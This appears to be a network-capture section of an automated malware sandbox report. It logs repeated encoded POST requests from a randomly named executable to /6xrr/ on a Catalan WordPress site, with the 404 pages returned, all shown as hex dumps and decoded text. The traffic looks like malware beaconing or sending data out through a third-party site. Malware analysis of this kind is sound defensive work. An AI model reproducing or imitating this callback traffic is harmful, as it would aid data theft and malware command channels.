2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED] Data Ascii: 4d5<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div st
Jan 11, 2025 02:50:12.987055063 CET	889	IN	Data Raw: 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a Data Ascii: yle="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	134.0.14.158	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:28.092587948 CET	636	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 41 69 62 59 58 4b 50 50 69 6d 58 72 30 44 4f 58 67 33 41 54 44 6f 45 6d 77 52 75 59 30 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: T0JX6z9=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=
Jan 11, 2025 02:50:28.953398943 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:50:28 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 11, 2025 02:50:28.953483105 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 11, 2025 02:50:28.953520060 CET	1236	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 11, 2025 02:50:28.953568935 CET	1236	IN	Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
Jan 11, 2025 02:50:28.953604937 CET	724	IN	Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Jan 11, 2025 02:50:28.953638077 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 11, 2025 02:50:28.953675032 CET	224	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href=
Jan 11, 2025 02:50:28.953713894 CET	1236	IN	Data Raw: 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6c 67 6f 72 69 2d 70 64 66 2d 76 69 65 77 65 72 2f 64 69 73 74 2f 62 6c 6f 63 6b 73 2e 73 74 79 6c 65 2e 62 75 69 6c 64 Data Ascii: 'http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.style.build.css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background
Jan 11, 2025 02:50:28.953756094 CET	224	IN	Data Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 Data Ascii: preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--grad
Jan 11, 2025 02:50:28.953773022 CET	1236	IN	Data Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
Jan 11, 2025 02:50:28.958653927 CET	1236	IN	Data Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	134.0.14.158	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:30.661734104 CET	656	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 41 76 6d 7a 35 59 64 44 62 47 38 66 75 71 30 52 4d 72 4b 79 6a 78 77 35 65 64 6a 43 4c 2b 65 2f 74 50 6d 47 39 77 Data Ascii: T0JX6z9=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDAvmz5YdDbG8fuq0RMrKyjxw5edjCL+e/tPmG9w
Jan 11, 2025 02:50:31.483747959 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:50:31 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 11, 2025 02:50:31.483762980 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 11, 2025 02:50:31.483774900 CET	1236	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 11, 2025 02:50:31.483880043 CET	1236	IN	Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
Jan 11, 2025 02:50:31.483897924 CET	1236	IN	Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Jan 11, 2025 02:50:31.483910084 CET	1236	IN	Data Raw: 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69 Data Ascii: ' /><link rel='stylesheet' id='wp-components-css' href='http://aballanet.cat/wp-includes/css/dist/components/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='wp-preferences-css' href='http://aballanet.cat/wp-includes/css/dis
Jan 11, 2025 02:50:31.483916044 CET	776	IN	Data Raw: 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 Data Ascii: w:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>:root{--wp--
Jan 11, 2025 02:50:31.483977079 CET	1236	IN	Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: inous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purp
Jan 11, 2025 02:50:31.483988047 CET	1236	IN	Data Raw: 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 34 2c 32 30 35 2c 31 36 35 29 20 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 Data Ascii: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: l
Jan 11, 2025 02:50:31.483999968 CET	1236	IN	Data Raw: 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 Data Ascii: 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout
Jan 11, 2025 02:50:31.488643885 CET	1236	IN	Data Raw: 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 Data Ascii: --preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	134.0.14.158	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:33.209640026 CET	1673	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 53 50 75 74 48 76 4e 4a 54 58 48 45 7a 49 4b 6c 42 78 35 64 79 33 46 79 75 79 34 35 6a 6f 45 4d 55 7a 71 32 59 75 43 6d 31 61 6d 4d 65 70 67 32 69 45 38 68 53 52 4d 75 35 6c 59 34 52 6b 6b 62 38 61 31 4b 47 4b 46 6c 41 34 46 4e 66 54 79 6f 6d 63 67 61 30 31 6e 69 35 65 75 34 46 30 48 30 61 37 32 30 4e 4f 63 71 74 34 61 2b 4f 4e 49 73 4d 4b 33 36 53 4a 64 34 53 52 41 52 45 33 6e 6f 45 4b 76 78 43 48 30 78 69 53 74 53 52 6a 50 52 51 37 47 55 35 74 64 55 66 50 5a 6a 35 2b 52 75 62 [TRUNCATED] Data Ascii: T0JX6z9=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDSPutHvNJTXHEzIKlBx5dy3Fyuy45joEMUzq2YuCm1amMepg2iE8hSRMu5lY4Rkkb8a1KGKFlA4FNfTyomcga01ni5eu4F0H0a720NOcqt4a+ONIsMK36SJd4SRARE3noEKvxCH0xiStSRjPRQ7GU5tdUfPZj5+Rubxt5LPXSdezx+fe6h6KO82rWi8xK2hPhQUrhfCZI7Tpw9b3kyCBFjcGVVsHyMizva9uYgh1MIVYl0RHjYCJAV5SoDZUh4TfcvVOivTBXppFuxK/jigPfTT3+qenhL0R7sNl8aEvMTqKuwK4cKpwHHBNpk5+JcZ7s0RSpCEIWgCKtS4zPw4i8lI1phaALXd11PUholXDs4LG6zdGiBsHreppqE8igrNvZuhbmjFDY3SNxrzvdDQWUSUav2+/Y/qdozslRzFzI0dzLaJsg3kp5qp16nzdM7V+AGC2samdriFyFuqzB6HIiIiFjsGKDrlBPbDYJz968u7BMGx+EiqbYMDg4VZK5irbrHPUNTqIpxVtcWSJNMxIl6Da8+hxsngAhQf7T9MLYXZVKphVKmSU6lP+/0ytZtlroqcJ4S4wLW825hDq4Nge7ydjIXC6a932F+DnUUW5BHvsUSaB0tnOvPzcRIvf6HsjOe4nTXqgtU5fU7AU/LtlVfhTZaAX5lUaJ6wKF7M3RPk1a1BEmszAcdf6NA5rbnoODOvdPMde9WBnjuLFJjKt2GhqXxEBSKBL/XIbq1rNZqYcSkVYsoZuw+/35KGlKZyRoJ74xB